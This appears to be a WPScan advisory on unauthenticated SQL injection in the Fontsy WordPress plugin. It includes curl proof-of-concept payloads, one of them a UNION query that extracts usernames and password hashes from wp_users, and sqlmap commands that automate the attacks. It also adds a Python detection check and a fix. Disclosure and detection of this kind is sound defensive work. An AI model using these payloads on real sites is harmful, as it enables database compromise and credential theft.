wpvulndb | cydave | WPVDB-ID:6939C405-AC62-4144-BD86-944D7B89D0AD
History: Dec 21, 2022 - 12:00 a.m.

Fontsy <= 1.8.6 - Multiple Unauthenticated SQLi

2022-12-21 00:00:00
cydave
wpscan.com
53
fontsy plugin
sql injection
unauthenticated access

EPSS

0.088

Percentile

94.7%

The plugin does not properly sanitize and escape a parameter before using it in a SQL statement via an AJAX action available to unauthenticated users, leading to a SQL injection.

PoC

curl -i 'http://example.com/wp-admin/admin-ajax.php?action=get_fonts' \
  --data 'id=1 AND (SELECT 1 FROM (SELECT(SLEEP(5)))hewu)'

... or use the sqlmap command below to automate the attack:

sqlmap -u 'http://example.com/wp-admin/admin-ajax.php?action=get_fonts' \
  --data 'id=1' \
  -p id \
  --risk 3 \
  --level 5 \
  --dbms mysql \
  --batch

curl -i 'http://example.com/wp-admin/admin-ajax.php?action=get_tag_fonts' \
  --data 'id=-1 UNION ALL SELECT NULL,NULL,NULL,CONCAT((SELECT user_login from wp_users),CHR(0x3a),(SELECT user_pass from wp_users)),NULL-- -'

... or use the sqlmap command below to automate the attack:

sqlmap -u 'http://example.com/wp-admin/admin-ajax.php?action=get_tag_fonts' \
  --data 'id=1' \
  -p id \
  --risk 3 \
  --level 5 \
  --dbms mysql \
  --batch

curl -i 'http://example.com/wp-admin/admin-ajax.php?action=delete_fonts' \
  --data 'font_id=1 AND (SELECT 1 FROM (SELECT(SLEEP(5)))kfTw)'

... or use the sqlmap command below to automate the attack:

sqlmap -u 'http://example.com/wp-admin/admin-ajax.php?action=delete_fonts' \
  --data 'font_id=1' \
  -p font_id \
  --risk 3 \
  --level 5 \
  --dbms mysql \
  --batch
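A detection check for the three AJAX actions above, written for this advisory as an added example (it is not WPScan's or the plugin's code). Every affected parameter is a numeric id, so any request to these actions whose `id` / `font_id` is not a plain integer is worth flagging; the action names and parameter names are taken from the PoC, and the sample traffic is constructed.

```python
import re
from urllib.parse import parse_qs, urlsplit

# The three admin-ajax.php actions named in the advisory and the parameter
# each reads (taken from the PoC above; the plugin's source is not on this page).
VULNERABLE_ACTIONS = {"get_fonts": "id", "get_tag_fonts": "id", "delete_fonts": "font_id"}

# Coarse MySQL injection markers, enough to match the advisory's payloads
# (time-based SLEEP, UNION SELECT). Not a general-purpose SQLi detector.
SQLI_MARKERS = re.compile(r"\b(sleep|benchmark|union|select)\b|--|/\*", re.I)

def inspect_request(url, body=""):
    """Flag a request to a listed action whose id parameter is not a plain
    integer. Returns a finding dict, or None for anything else."""
    parts = urlsplit(url)
    if not parts.path.endswith("/wp-admin/admin-ajax.php"):
        return None
    query = parse_qs(parts.query)
    action = query.get("action", [None])[0]
    param = VULNERABLE_ACTIONS.get(action)
    if param is None:
        return None
    # The parameter may arrive in the POST body (as in the PoC) or the query string.
    values = parse_qs(body).get(param) or query.get(param) or []
    for value in values:
        if not value.strip().isdigit():
            return {"action": action, "param": param, "value": value,
                    "sqli_markers": bool(SQLI_MARKERS.search(value))}
    return None

# Constructed sample traffic: benign calls plus the advisory's PoC payloads.
SAMPLE_REQUESTS = [
    ("http://example.com/wp-admin/admin-ajax.php?action=get_fonts", "id=7"),
    ("http://example.com/wp-admin/admin-ajax.php?action=get_fonts",
     "id=1 AND (SELECT 1 FROM (SELECT(SLEEP(5)))hewu)"),
    ("http://example.com/wp-admin/admin-ajax.php?action=delete_fonts",
     "font_id=1 AND (SELECT 1 FROM (SELECT(SLEEP(5)))kfTw)"),
    ("http://example.com/wp-admin/admin-ajax.php?action=heartbeat", "id=x"),
]

def scan(requests=SAMPLE_REQUESTS):
    """Run inspect_request over (url, body) pairs and return the findings."""
    return [f for f in (inspect_request(u, b) for u, b in requests) if f]
```

The same integer check is the fix on the server side: cast the parameter with intval() or bind it through $wpdb->prepare() before it reaches the query.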
